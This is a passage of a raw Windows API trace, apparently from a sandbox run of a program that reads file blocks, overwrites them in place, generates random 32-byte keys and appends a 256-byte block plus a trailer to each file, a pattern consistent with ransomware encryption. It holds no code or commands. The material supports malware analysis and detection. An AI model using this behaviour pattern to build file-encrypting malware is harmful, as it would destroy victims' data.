lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0079.259] GetProcessHeap () returned 0x4f10000 [0079.259] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0079.259] GetProcessHeap () returned 0x4f10000 [0079.259] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0079.259] GetProcessHeap () returned 0x4f10000 [0079.259] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0079.259] CloseHandle (hObject=0x824) returned 1 [0079.260] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 42 [0079.260] SetFilePointerEx (in: hFile=0x828, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.260] ReadFile (in: hFile=0x828, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0079.260] SetFilePointerEx (in: hFile=0x828, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.260] GetProcessHeap () returned 0x4f10000 [0079.261] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0079.261] GetProcessHeap () returned 0x4f10000 [0079.261] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0079.261] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0079.261] GetProcessHeap () returned 0x4f10000 [0079.261] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0079.261] ReadFile (in: hFile=0x828, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0079.330] SetFilePointerEx (in: hFile=0x828, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.331] WriteFile (in: hFile=0x828, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0079.331] GetProcessHeap () returned 0x4f10000 [0079.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0079.331] GetProcessHeap () returned 0x4f10000 [0079.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.331] GetProcessHeap () returned 0x4f10000 [0079.331] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0079.331] GetProcessHeap () returned 0x4f10000 [0079.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.331] GetProcessHeap () returned 0x4f10000 [0079.331] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0079.331] GetProcessHeap () returned 0x4f10000 [0079.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.331] GetProcessHeap () returned 0x4f10000 [0079.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.331] GetProcessHeap () returned 0x4f10000 [0079.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.331] GetProcessHeap () returned 0x4f10000 [0079.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.331] GetProcessHeap () returned 0x4f10000 [0079.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.331] GetProcessHeap () returned 0x4f10000 [0079.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.331] GetProcessHeap () returned 0x4f10000 [0079.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.331] GetProcessHeap () returned 0x4f10000 [0079.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.332] GetProcessHeap () returned 0x4f10000 [0079.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.332] GetProcessHeap () returned 0x4f10000 [0079.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.332] GetProcessHeap () returned 0x4f10000 [0079.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.332] GetProcessHeap () returned 0x4f10000 [0079.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.332] GetProcessHeap () returned 0x4f10000 [0079.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.332] GetProcessHeap () returned 0x4f10000 [0079.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.332] GetProcessHeap () returned 0x4f10000 [0079.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.332] GetProcessHeap () returned 0x4f10000 [0079.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.332] GetProcessHeap () returned 0x4f10000 [0079.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.332] GetProcessHeap () returned 0x4f10000 [0079.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.332] GetProcessHeap () returned 0x4f10000 [0079.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.332] GetProcessHeap () returned 0x4f10000 [0079.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.332] GetProcessHeap () returned 0x4f10000 [0079.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.332] GetProcessHeap () returned 0x4f10000 [0079.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.332] GetProcessHeap () returned 0x4f10000 [0079.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.332] GetProcessHeap () returned 0x4f10000 [0079.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.332] GetProcessHeap () returned 0x4f10000 [0079.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.332] GetProcessHeap () returned 0x4f10000 [0079.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.332] GetProcessHeap () returned 0x4f10000 [0079.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.332] GetProcessHeap () returned 0x4f10000 [0079.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.333] GetProcessHeap () returned 0x4f10000 [0079.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.333] GetProcessHeap () returned 0x4f10000 [0079.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.333] GetProcessHeap () returned 0x4f10000 [0079.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.333] GetProcessHeap () returned 0x4f10000 [0079.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.333] GetProcessHeap () returned 0x4f10000 [0079.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.333] GetProcessHeap () returned 0x4f10000 [0079.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0079.333] GetProcessHeap () returned 0x4f10000 [0079.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.333] GetProcessHeap () returned 0x4f10000 [0079.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0079.333] GetProcessHeap () returned 0x4f10000 [0079.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0079.333] GetProcessHeap () returned 0x4f10000 [0079.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0079.333] GetProcessHeap () returned 0x4f10000 [0079.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0079.333] GetProcessHeap () returned 0x4f10000 [0079.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0079.333] GetProcessHeap () returned 0x4f10000 [0079.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0079.333] GetProcessHeap () returned 0x4f10000 [0079.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.333] GetProcessHeap () returned 0x4f10000 [0079.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0079.333] GetProcessHeap () returned 0x4f10000 [0079.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.333] GetProcessHeap () returned 0x4f10000 [0079.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.334] GetProcessHeap () returned 0x4f10000 [0079.334] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.334] GetProcessHeap () returned 0x4f10000 [0079.334] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.334] GetProcessHeap () returned 0x4f10000 [0079.334] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.334] GetProcessHeap () returned 0x4f10000 [0079.334] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.334] GetProcessHeap () returned 0x4f10000 [0079.334] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.334] GetProcessHeap () returned 0x4f10000 [0079.334] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.334] GetProcessHeap () returned 0x4f10000 [0079.334] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.334] GetProcessHeap () returned 0x4f10000 [0079.334] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.334] GetProcessHeap () returned 0x4f10000 [0079.334] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.334] GetProcessHeap () returned 0x4f10000 [0079.334] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.334] GetProcessHeap () returned 0x4f10000 [0079.334] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.334] GetProcessHeap () returned 0x4f10000 [0079.334] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.334] GetProcessHeap () returned 0x4f10000 [0079.334] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.334] GetProcessHeap () returned 0x4f10000 [0079.334] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.335] GetProcessHeap () returned 0x4f10000 [0079.335] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.335] GetProcessHeap () returned 0x4f10000 [0079.335] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.335] GetProcessHeap () returned 0x4f10000 [0079.335] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.335] GetProcessHeap () returned 0x4f10000 [0079.335] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.335] GetProcessHeap () returned 0x4f10000 [0079.335] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.335] GetProcessHeap () returned 0x4f10000 [0079.335] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.335] GetProcessHeap () returned 0x4f10000 [0079.335] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.335] GetProcessHeap () returned 0x4f10000 [0079.335] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.335] GetProcessHeap () returned 0x4f10000 [0079.335] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0079.335] GetProcessHeap () returned 0x4f10000 [0079.335] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.335] GetProcessHeap () returned 0x4f10000 [0079.335] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0079.335] GetProcessHeap () returned 0x4f10000 [0079.335] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0079.335] GetProcessHeap () returned 0x4f10000 [0079.335] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0079.335] GetProcessHeap () returned 0x4f10000 [0079.335] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0079.335] SetFilePointerEx (in: hFile=0x828, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.335] WriteFile (in: hFile=0x828, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0079.336] WriteFile (in: hFile=0x828, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0079.336] GetProcessHeap () returned 0x4f10000 [0079.336] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0079.336] GetProcessHeap () returned 0x4f10000 [0079.336] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0079.336] GetProcessHeap () returned 0x4f10000 [0079.336] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0079.336] CloseHandle (hObject=0x828) returned 1 [0079.337] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 43 [0079.337] SetFilePointerEx (in: hFile=0x82c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.337] ReadFile (in: hFile=0x82c, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0079.337] SetFilePointerEx (in: hFile=0x82c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.337] GetProcessHeap () returned 0x4f10000 [0079.337] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0079.337] GetProcessHeap () returned 0x4f10000 [0079.337] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0079.337] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0079.337] GetProcessHeap () returned 0x4f10000 [0079.337] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0079.338] ReadFile (in: hFile=0x82c, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0079.390] SetFilePointerEx (in: hFile=0x82c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.390] WriteFile (in: hFile=0x82c, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0079.390] GetProcessHeap () returned 0x4f10000 [0079.390] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0079.390] GetProcessHeap () returned 0x4f10000 [0079.390] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.390] GetProcessHeap () returned 0x4f10000 [0079.390] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0079.391] GetProcessHeap () returned 0x4f10000 [0079.391] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.391] GetProcessHeap () returned 0x4f10000 [0079.391] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0079.391] GetProcessHeap () returned 0x4f10000 [0079.391] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.391] GetProcessHeap () returned 0x4f10000 [0079.391] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.391] GetProcessHeap () returned 0x4f10000 [0079.391] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.391] GetProcessHeap () returned 0x4f10000 [0079.391] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.391] GetProcessHeap () returned 0x4f10000 [0079.391] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.391] GetProcessHeap () returned 0x4f10000 [0079.391] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.391] GetProcessHeap () returned 0x4f10000 [0079.391] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.391] GetProcessHeap () returned 0x4f10000 [0079.391] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.391] GetProcessHeap () returned 0x4f10000 [0079.391] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.391] GetProcessHeap () returned 0x4f10000 [0079.391] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.391] GetProcessHeap () returned 0x4f10000 [0079.391] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.391] GetProcessHeap () returned 0x4f10000 [0079.391] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.391] GetProcessHeap () returned 0x4f10000 [0079.391] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.391] GetProcessHeap () returned 0x4f10000 [0079.391] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.391] GetProcessHeap () returned 0x4f10000 [0079.391] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.391] GetProcessHeap () returned 0x4f10000 [0079.391] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.391] GetProcessHeap () returned 0x4f10000 [0079.391] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.392] GetProcessHeap () returned 0x4f10000 [0079.392] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.392] GetProcessHeap () returned 0x4f10000 [0079.392] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.392] GetProcessHeap () returned 0x4f10000 [0079.392] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.392] GetProcessHeap () returned 0x4f10000 [0079.392] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.392] GetProcessHeap () returned 0x4f10000 [0079.392] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.392] GetProcessHeap () returned 0x4f10000 [0079.392] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.392] GetProcessHeap () returned 0x4f10000 [0079.392] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.392] GetProcessHeap () returned 0x4f10000 [0079.392] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.392] GetProcessHeap () returned 0x4f10000 [0079.392] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.392] GetProcessHeap () returned 0x4f10000 [0079.392] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.392] GetProcessHeap () returned 0x4f10000 [0079.392] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.392] GetProcessHeap () returned 0x4f10000 [0079.392] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.392] GetProcessHeap () returned 0x4f10000 [0079.392] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.392] GetProcessHeap () returned 0x4f10000 [0079.392] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.392] GetProcessHeap () returned 0x4f10000 [0079.392] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.392] GetProcessHeap () returned 0x4f10000 [0079.392] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.392] GetProcessHeap () returned 0x4f10000 [0079.392] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0079.392] GetProcessHeap () returned 0x4f10000 [0079.392] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.392] GetProcessHeap () returned 0x4f10000 [0079.392] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0079.393] GetProcessHeap () returned 0x4f10000 [0079.393] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0079.393] GetProcessHeap () returned 0x4f10000 [0079.393] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0079.393] GetProcessHeap () returned 0x4f10000 [0079.393] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0079.393] GetProcessHeap () returned 0x4f10000 [0079.393] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0079.393] GetProcessHeap () returned 0x4f10000 [0079.393] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0079.393] GetProcessHeap () returned 0x4f10000 [0079.393] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.393] GetProcessHeap () returned 0x4f10000 [0079.393] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0079.393] GetProcessHeap () returned 0x4f10000 [0079.393] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.512] GetProcessHeap () returned 0x4f10000 [0079.512] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.512] GetProcessHeap () returned 0x4f10000 [0079.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.512] GetProcessHeap () returned 0x4f10000 [0079.512] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.512] GetProcessHeap () returned 0x4f10000 [0079.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.512] GetProcessHeap () returned 0x4f10000 [0079.512] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.512] GetProcessHeap () returned 0x4f10000 [0079.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.513] GetProcessHeap () returned 0x4f10000 [0079.513] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.513] GetProcessHeap () returned 0x4f10000 [0079.513] 